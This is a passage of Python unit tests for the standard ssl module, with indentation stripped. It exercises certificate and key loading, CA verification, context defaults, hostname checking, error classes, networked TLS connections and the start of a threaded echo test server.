# Password protected key and cert
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD.encode())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=bytearray(KEY_PASSWORD.encode()))
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD)
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD.encode())
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED,
bytearray(KEY_PASSWORD.encode()))
with self.assertRaisesRegexp(TypeError, "should be a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=True)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password="badpass")
with self.assertRaisesRegexp(ValueError, "cannot be longer"):
# openssl has a fixed limit on the password buffer.
# PEM_BUFSIZE is generally set to 1kb.
# Return a string larger than this.
ctx.load_cert_chain(CERTFILE_PROTECTED, password=b'a' * 102400)
# Password callback
def getpass_unicode():
return KEY_PASSWORD
def getpass_bytes():
return KEY_PASSWORD.encode()
def getpass_bytearray():
return bytearray(KEY_PASSWORD.encode())
def getpass_badpass():
return "badpass"
def getpass_huge():
return b'a' * (1024 * 1024)
def getpass_bad_type():
return 9
def getpass_exception():
raise Exception('getpass error')
class GetPassCallable:
def __call__(self):
return KEY_PASSWORD
def getpass(self):
return KEY_PASSWORD
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_unicode)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytes)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytearray)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=GetPassCallable())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=GetPassCallable().getpass)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_badpass)
with self.assertRaisesRegexp(ValueError, "cannot be longer"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_huge)
with self.assertRaisesRegexp(TypeError, "must return a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bad_type)
with self.assertRaisesRegexp(Exception, "getpass error"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_exception)
# Make sure the password function isn't called if it isn't needed
ctx.load_cert_chain(CERTFILE, password=getpass_exception)
def test_load_verify_locations(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_verify_locations(CERTFILE)
ctx.load_verify_locations(cafile=CERTFILE, capath=None)
ctx.load_verify_locations(BYTES_CERTFILE)
ctx.load_verify_locations(cafile=BYTES_CERTFILE, capath=None)
ctx.load_verify_locations(cafile=BYTES_CERTFILE.decode('utf-8'))
self.assertRaises(TypeError, ctx.load_verify_locations)
self.assertRaises(TypeError, ctx.load_verify_locations, None, None, None)
with self.assertRaises(IOError) as cm:
ctx.load_verify_locations(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(IOError):
ctx.load_verify_locations(u'')
with self.assertRaisesRegexp(ssl.SSLError, "PEM lib"):
ctx.load_verify_locations(BADCERT)
ctx.load_verify_locations(CERTFILE, CAPATH)
ctx.load_verify_locations(CERTFILE, capath=BYTES_CAPATH)
# Issue #10989: crash if the second argument type is invalid
self.assertRaises(TypeError, ctx.load_verify_locations, None, True)
def test_load_verify_cadata(self):
# test cadata
with open(CAFILE_CACERT) as f:
cacert_pem = f.read().decode("ascii")
cacert_der = ssl.PEM_cert_to_DER_cert(cacert_pem)
with open(CAFILE_NEURONIO) as f:
neuronio_pem = f.read().decode("ascii")
neuronio_der = ssl.PEM_cert_to_DER_cert(neuronio_pem)
# test PEM
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 0)
ctx.load_verify_locations(cadata=cacert_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 1)
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = "\n".join((cacert_pem, neuronio_pem))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# with junk around the certs
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = ["head", cacert_pem, "other", neuronio_pem, "again",
neuronio_pem, "tail"]
ctx.load_verify_locations(cadata="\n".join(combined))
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# test DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_verify_locations(cadata=cacert_der)
ctx.load_verify_locations(cadata=neuronio_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=cacert_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = b"".join((cacert_der, neuronio_der))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# error cases
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertRaises(TypeError, ctx.load_verify_locations, cadata=object)
with self.assertRaisesRegexp(ssl.SSLError, "no start line"):
ctx.load_verify_locations(cadata=u"broken")
with self.assertRaisesRegexp(ssl.SSLError, "not enough data"):
ctx.load_verify_locations(cadata=b"broken")
def test_load_dh_params(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_dh_params(DHFILE)
if os.name != 'nt':
ctx.load_dh_params(BYTES_DHFILE)
self.assertRaises(TypeError, ctx.load_dh_params)
self.assertRaises(TypeError, ctx.load_dh_params, None)
with self.assertRaises(IOError) as cm:
ctx.load_dh_params(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
@skip_if_broken_ubuntu_ssl
def test_session_stats(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.session_stats(), {
'number': 0,
'connect': 0,
'connect_good': 0,
'connect_renegotiate': 0,
'accept': 0,
'accept_good': 0,
'accept_renegotiate': 0,
'hits': 0,
'misses': 0,
'timeouts': 0,
'cache_full': 0,
})
def test_set_default_verify_paths(self):
# There's not much we can do to test that it acts as expected,
# so just check it doesn't crash or raise an exception.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_default_verify_paths()
@unittest.skipUnless(ssl.HAS_ECDH, "ECDH disabled on this OpenSSL build") # gevent run on 2.7.8
def test_set_ecdh_curve(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_ecdh_curve("prime256v1")
ctx.set_ecdh_curve(b"prime256v1")
self.assertRaises(TypeError, ctx.set_ecdh_curve)
self.assertRaises(TypeError, ctx.set_ecdh_curve, None)
self.assertRaises(ValueError, ctx.set_ecdh_curve, "foo")
self.assertRaises(ValueError, ctx.set_ecdh_curve, b"foo")
@needs_sni
def test_sni_callback(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# set_servername_callback expects a callable, or None
self.assertRaises(TypeError, ctx.set_servername_callback)
self.assertRaises(TypeError, ctx.set_servername_callback, 4)
self.assertRaises(TypeError, ctx.set_servername_callback, "")
self.assertRaises(TypeError, ctx.set_servername_callback, ctx)
def dummycallback(sock, servername, ctx):
pass
ctx.set_servername_callback(None)
ctx.set_servername_callback(dummycallback)
@needs_sni
def test_sni_callback_refcycle(self):
# Reference cycles through the servername callback are detected
# and cleared.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
def dummycallback(sock, servername, ctx, cycle=ctx):
pass
ctx.set_servername_callback(dummycallback)
wr = weakref.ref(ctx)
del ctx, dummycallback
gc.collect()
self.assertIs(wr(), None)
def test_cert_store_stats(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_cert_chain(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 1})
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 1, 'crl': 0, 'x509': 2})
def test_get_ca_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.get_ca_certs(), [])
# CERTFILE is not flagged as X509v3 Basic Constraints: CA:TRUE
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.get_ca_certs(), [])
# but CAFILE_CACERT is a CA cert
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.get_ca_certs(),
[{'issuer': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'notAfter': asn1time('Mar 29 12:29:49 2033 GMT'),
'notBefore': asn1time('Mar 30 12:29:49 2003 GMT'),
'serialNumber': '00',
'crlDistributionPoints': ('https://www.cacert.org/revoke.crl',),
'subject': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'version': 3}])
with open(CAFILE_CACERT) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
self.assertEqual(ctx.get_ca_certs(True), [der])
def test_load_default_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs(ssl.Purpose.SERVER_AUTH)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs(ssl.Purpose.CLIENT_AUTH)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertRaises(TypeError, ctx.load_default_certs, None)
self.assertRaises(TypeError, ctx.load_default_certs, 'SERVER_AUTH')
@unittest.skipIf(sys.platform == "win32", "not-Windows specific")
def test_load_default_certs_env(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
self.assertEqual(ctx.cert_store_stats(), {"crl": 0, "x509": 1, "x509_ca": 0})
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_load_default_certs_env_windows(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs()
stats = ctx.cert_store_stats()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
stats["x509"] += 1
self.assertEqual(ctx.cert_store_stats(), stats)
def test_create_default_context(self):
ctx = ssl.create_default_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
self.assertEqual(
ctx.options & getattr(ssl, "OP_NO_COMPRESSION", 0),
getattr(ssl, "OP_NO_COMPRESSION", 0),
)
with open(SIGNING_CA) as f:
cadata = f.read().decode("ascii")
ctx = ssl.create_default_context(cafile=SIGNING_CA, capath=CAPATH,
cadata=cadata)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
self.assertEqual(
ctx.options & getattr(ssl, "OP_NO_COMPRESSION", 0),
getattr(ssl, "OP_NO_COMPRESSION", 0),
)
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
self.assertEqual(
ctx.options & getattr(ssl, "OP_NO_COMPRESSION", 0),
getattr(ssl, "OP_NO_COMPRESSION", 0),
)
self.assertEqual(
ctx.options & getattr(ssl, "OP_SINGLE_DH_USE", 0),
getattr(ssl, "OP_SINGLE_DH_USE", 0),
)
self.assertEqual(
ctx.options & getattr(ssl, "OP_SINGLE_ECDH_USE", 0),
getattr(ssl, "OP_SINGLE_ECDH_USE", 0),
)
def test__create_stdlib_context(self):
ctx = ssl._create_stdlib_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1,
cert_reqs=ssl.CERT_REQUIRED,
check_hostname=True)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
ctx = ssl._create_stdlib_context(purpose=ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
def test_check_hostname(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertFalse(ctx.check_hostname)
# Requires CERT_REQUIRED or CERT_OPTIONAL
with self.assertRaises(ValueError):
ctx.check_hostname = True
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertFalse(ctx.check_hostname)
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
# Cannot set CERT_NONE with check_hostname enabled
with self.assertRaises(ValueError):
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
class SSLErrorTests(unittest.TestCase):
def test_str(self):
# The str() of a SSLError doesn't include the errno
e = ssl.SSLError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
# Same for a subclass
e = ssl.SSLZeroReturnError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
def test_lib_reason(self):
# Test the library and reason attributes
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
self.assertEqual(cm.exception.library, 'PEM')
self.assertEqual(cm.exception.reason, 'NO_START_LINE')
s = str(cm.exception)
self.assertTrue(s.startswith("[PEM: NO_START_LINE] no start line"), s)
def test_subclass(self):
# Check that the appropriate SSLError subclass is raised
# (this only tests one of them)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with closing(socket.socket()) as s:
s.bind(("127.0.0.1", 0))
s.listen(5)
c = socket.socket()
c.connect(s.getsockname())
c.setblocking(False)
with closing(ctx.wrap_socket(c, False, do_handshake_on_connect=False)) as c:
with self.assertRaises(ssl.SSLWantReadError) as cm:
c.do_handshake()
s = str(cm.exception)
self.assertTrue(s.startswith("The operation did not complete (read)"), s)
# For compatibility
self.assertEqual(cm.exception.errno, ssl.SSL_ERROR_WANT_READ)
class NetworkedTests(unittest.TestCase):
def test_connect(self):
with support.transient_internet(REMOTE_HOST):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE)
try:
s.connect((REMOTE_HOST, 443))
self.assertEqual({}, s.getpeercert())
finally:
s.close()
# this should fail because we have no verification certs
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.assertRaisesRegexp(ssl.SSLError, "certificate verify failed",
s.connect, (REMOTE_HOST, 443))
s.close()
# this should succeed because we specify the root cert
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=REMOTE_ROOT_CERT)
try:
s.connect((REMOTE_HOST, 443))
self.assertTrue(s.getpeercert())
finally:
s.close()
def test_connect_ex(self):
# Issue #11326: check connect_ex() implementation
with support.transient_internet(REMOTE_HOST):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=REMOTE_ROOT_CERT)
try:
self.assertEqual(0, s.connect_ex((REMOTE_HOST, 443)))
self.assertTrue(s.getpeercert())
finally:
s.close()
def test_non_blocking_connect_ex(self):
# Issue #11326: non-blocking connect_ex() should allow handshake
# to proceed after the socket gets ready.
with support.transient_internet(REMOTE_HOST):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=REMOTE_ROOT_CERT,
do_handshake_on_connect=False)
try:
s.setblocking(False)
rc = s.connect_ex((REMOTE_HOST, 443))
# EWOULDBLOCK under Windows, EINPROGRESS elsewhere
self.assertIn(rc, (0, errno.EINPROGRESS, errno.EWOULDBLOCK))
# Wait for connect to finish
select.select([], [s], [], 5.0)
# Non-blocking handshake
while True:
try:
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [], 5.0)
except ssl.SSLWantWriteError:
select.select([], [s], [], 5.0)
# SSL established
self.assertTrue(s.getpeercert())
finally:
s.close()
def test_timeout_connect_ex(self):
# Issue #12065: on a timeout, connect_ex() should return the original
# errno (mimicking the behaviour of non-SSL sockets).
with support.transient_internet(REMOTE_HOST):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=REMOTE_ROOT_CERT,
do_handshake_on_connect=False)
try:
s.settimeout(0.0000001)
rc = s.connect_ex((REMOTE_HOST, 443))
if rc == 0:
self.skipTest("REMOTE_HOST responded too quickly")
self.assertIn(rc, (errno.EAGAIN, errno.EWOULDBLOCK))
finally:
s.close()
def test_connect_ex_error(self):
with support.transient_internet(REMOTE_HOST):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=REMOTE_ROOT_CERT)
try:
rc = s.connect_ex((REMOTE_HOST, 444))
# Issue #19919: Windows machines or VMs hosted on Windows
# machines sometimes return EWOULDBLOCK.
errors = (
errno.ECONNREFUSED, errno.EHOSTUNREACH, errno.ETIMEDOUT,
errno.EWOULDBLOCK,
)
self.assertIn(rc, errors)
finally:
s.close()
def test_connect_with_context(self):
with support.transient_internet(REMOTE_HOST):
# Same as test_connect, but with a separately created context
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect((REMOTE_HOST, 443))
try:
self.assertEqual({}, s.getpeercert())
finally:
s.close()
# Same with a server hostname
s = ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname=REMOTE_HOST)
s.connect((REMOTE_HOST, 443))
s.close()
# This should fail because we have no verification certs
ctx.verify_mode = ssl.CERT_REQUIRED
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
self.assertRaisesRegexp(ssl.SSLError, "certificate verify failed",
s.connect, (REMOTE_HOST, 443))
s.close()
# This should succeed because we specify the root cert
ctx.load_verify_locations(REMOTE_ROOT_CERT)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect((REMOTE_HOST, 443))
try:
cert = s.getpeercert()
self.assertTrue(cert)
finally:
s.close()
def test_connect_capath(self):
# Verify server certificates using the `capath` argument
# NOTE: the subject hashing algorithm has been changed between
# OpenSSL 0.9.8n and 1.0.0, as a result the capath directory must
# contain both versions of each certificate (same content, different
# filename) for this test to be portable across OpenSSL releases.
with support.transient_internet(REMOTE_HOST):
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=CAPATH)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect((REMOTE_HOST, 443))
try:
cert = s.getpeercert()
self.assertTrue(cert)
finally:
s.close()
# Same with a bytes `capath` argument
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=BYTES_CAPATH)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect((REMOTE_HOST, 443))
try:
cert = s.getpeercert()
self.assertTrue(cert)
finally:
s.close()
def test_connect_cadata(self):
with open(REMOTE_ROOT_CERT) as f:
pem = f.read().decode('ascii')
der = ssl.PEM_cert_to_DER_cert(pem)
with support.transient_internet(REMOTE_HOST):
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=pem)
with closing(ctx.wrap_socket(socket.socket(socket.AF_INET))) as s:
s.connect((REMOTE_HOST, 443))
cert = s.getpeercert()
self.assertTrue(cert)
# same with DER
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=der)
with closing(ctx.wrap_socket(socket.socket(socket.AF_INET))) as s:
s.connect((REMOTE_HOST, 443))
cert = s.getpeercert()
self.assertTrue(cert)
@unittest.skipIf(os.name == "nt", "Can't use a socket as a file under Windows")
def test_makefile_close(self):
# Issue #5238: creating a file-like object with makefile() shouldn't
# delay closing the underlying "real socket" (here tested with its
# file descriptor, hence skipping the test under Windows).
with support.transient_internet(REMOTE_HOST):
ss = ssl.wrap_socket(socket.socket(socket.AF_INET))
ss.connect((REMOTE_HOST, 443))
fd = ss.fileno()
f = ss.makefile()
f.close()
# The fd is still open
os.read(fd, 0)
# Closing the SSL socket should close the fd too
ss.close()
gc.collect()
with self.assertRaises(OSError) as e:
os.read(fd, 0)
self.assertEqual(e.exception.errno, errno.EBADF)
def test_non_blocking_handshake(self):
with support.transient_internet(REMOTE_HOST):
s = socket.socket(socket.AF_INET)
s.connect((REMOTE_HOST, 443))
s.setblocking(False)
s = ssl.wrap_socket(s,
cert_reqs=ssl.CERT_NONE,
do_handshake_on_connect=False)
count = 0
while True:
try:
count += 1
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [])
except ssl.SSLWantWriteError:
select.select([], [s], [])
s.close()
if support.verbose:
sys.stdout.write("\nNeeded %d calls to do_handshake() to establish session.\n" % count)
def test_get_server_certificate(self):
def _test_get_server_certificate(host, port, cert=None):
with support.transient_internet(host):
pem = ssl.get_server_certificate((host, port))
if not pem:
self.fail("No server certificate on %s:%s!" % (host, port))
try:
pem = ssl.get_server_certificate((host, port),
ca_certs=CERTFILE)
except ssl.SSLError as x:
#should fail
if support.verbose:
sys.stdout.write("%s\n" % x)
else:
self.fail("Got server certificate %s for %s:%s!" % (pem, host, port))
pem = ssl.get_server_certificate((host, port),
ca_certs=cert)
if not pem:
self.fail("No server certificate on %s:%s!" % (host, port))
if support.verbose:
sys.stdout.write("\nVerified certificate for %s:%s is\n%s\n" % (host, port ,pem))
_test_get_server_certificate(REMOTE_HOST, 443, REMOTE_ROOT_CERT)
if support.IPV6_ENABLED:
_test_get_server_certificate('ipv6.google.com', 443)
def test_ciphers(self):
remote = (REMOTE_HOST, 443)
with support.transient_internet(remote[0]):
with closing(ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="ALL")) as s:
s.connect(remote)
with closing(ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="DEFAULT")) as s:
s.connect(remote)
# Error checking can happen at instantiation or when connecting
with self.assertRaisesRegexp(ssl.SSLError, "No cipher can be selected"):
with closing(socket.socket(socket.AF_INET)) as sock:
s = ssl.wrap_socket(sock,
cert_reqs=ssl.CERT_NONE, ciphers="^$:,;?*'dorothyx")
s.connect(remote)
def test_algorithms(self):
# Issue #8484: all algorithms should be available when verifying a
# certificate.
# SHA256 was added in OpenSSL 0.9.8
if ssl.OPENSSL_VERSION_INFO < (0, 9, 8, 0, 15):
self.skipTest("SHA256 not available on %r" % ssl.OPENSSL_VERSION)
# sha256.tbs-internet.com needs SNI to use the correct certificate
if not ssl.HAS_SNI:
self.skipTest("SNI needed for this test")
# https://sha2.hboeck.de/ was used until 2011-01-08 (no route to host)
remote = ("sha256.tbs-internet.com", 443)
sha256_cert = os.path.join(os.path.dirname(__file__), "sha256.pem")
with support.transient_internet("sha256.tbs-internet.com"):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(sha256_cert)
s = ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname="sha256.tbs-internet.com")
try:
s.connect(remote)
if support.verbose:
sys.stdout.write("\nCipher with %r is %r\n" %
(remote, s.cipher()))
sys.stdout.write("Certificate is:\n%s\n" %
pprint.pformat(s.getpeercert()))
finally:
s.close()
def test_get_ca_certs_capath(self):
# capath certs are loaded on request
with support.transient_internet(REMOTE_HOST):
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=CAPATH)
self.assertEqual(ctx.get_ca_certs(), [])
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect((REMOTE_HOST, 443))
try:
cert = s.getpeercert()
self.assertTrue(cert)
finally:
s.close()
self.assertEqual(len(ctx.get_ca_certs()), 1)
@needs_sni
def test_context_setget(self):
# Check that the context of a connected socket can be replaced.
with support.transient_internet(REMOTE_HOST):
ctx1 = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx2 = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
s = socket.socket(socket.AF_INET)
with closing(ctx1.wrap_socket(s)) as ss:
ss.connect((REMOTE_HOST, 443))
self.assertIs(ss.context, ctx1)
self.assertIs(ss._sslobj.context, ctx1)
ss.context = ctx2
self.assertIs(ss.context, ctx2)
self.assertIs(ss._sslobj.context, ctx2)
try:
import threading
except ImportError:
_have_threads = False
else:
_have_threads = True
from test.ssl_servers import make_https_server
class ThreadedEchoServer(threading.Thread):
class ConnectionHandler(threading.Thread):
"""A mildly complicated class, because we want it to work both
with and without the SSL wrapper around the socket connection, so
that we can test the STARTTLS functionality."""
def __init__(self, server, connsock, addr):
self.server = server
self.running = False
self.sock = connsock
self.addr = addr
self.sock.setblocking(1)
self.sslconn = None
threading.Thread.__init__(self)
self.daemon = True
def wrap_conn(self):
try:
self.sslconn = self.server.context.wrap_socket(
self.sock, server_side=True)
self.server.selected_npn_protocols.append(self.sslconn.selected_npn_protocol())
self.server.selected_alpn_protocols.append(self.sslconn.selected_alpn_protocol())
except socket.error as e:
# We treat ConnectionResetError as though it were an
# SSLError - OpenSSL on Ubuntu abruptly closes the
# connection when asked to use an unsupported protocol.
#
# XXX Various errors can have happened here, for example
# a mismatching protocol version, an invalid certificate,
# or a low-level bug. This should be made more discriminating.
if not isinstance(e, ssl.SSLError) and e.errno != errno.ECONNRESET:
raise
self.server.conn_errors.append(e)
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.server.stop()
self.close()
return False
else:
if self.server.context.verify_mode == ssl.CERT_REQUIRED:
cert = self.sslconn.getpeercert()
if support.verbose and self.server.chatty:
sys.stdout.write(" client cert is " + pprint.pformat(cert) + "\n")
cert_binary = self.sslconn.getpeercert(True)
if support.verbose and self.server.chatty:
sys.stdout.write(" cert binary is " + str(len(cert_binary)) + " bytes\n")
cipher = self.sslconn.cipher()
if support.verbose and self.server.chatty:
sys.stdout.write(" server: connection cipher is now " + str(cipher) + "\n")
sys.stdout.write(" server: selected protocol is now "
+ str(self.sslconn.selected_npn_protocol()) + "\n")
return True
def read(self):
if self.sslconn:
return self.sslconn.read()
else:
return self.sock.recv(1024)
def write(self, bytes):
if self.sslconn:
return self.sslconn.write(bytes)
else:
return self.sock.send(bytes)
def close(self):
if self.sslconn:
self.sslconn.close()
else:
self.sock.close()
def run(self):
self.running = True
if not self.server.starttls_server:
if not self.wrap_conn():
return
while self.running:
try:
msg = self.read()
stripped = msg.strip()
if not stripped:
# eof, so quit this handler
self.running = False
self.close()
elif stripped == b'over':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: client closed connection\n")
self.close()
return
elif (self.server.starttls_server and
stripped == b'STARTTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read STARTTLS from client, sending OK...\n")
self.write(b"OK\n")
if not self.wrap_conn():
return
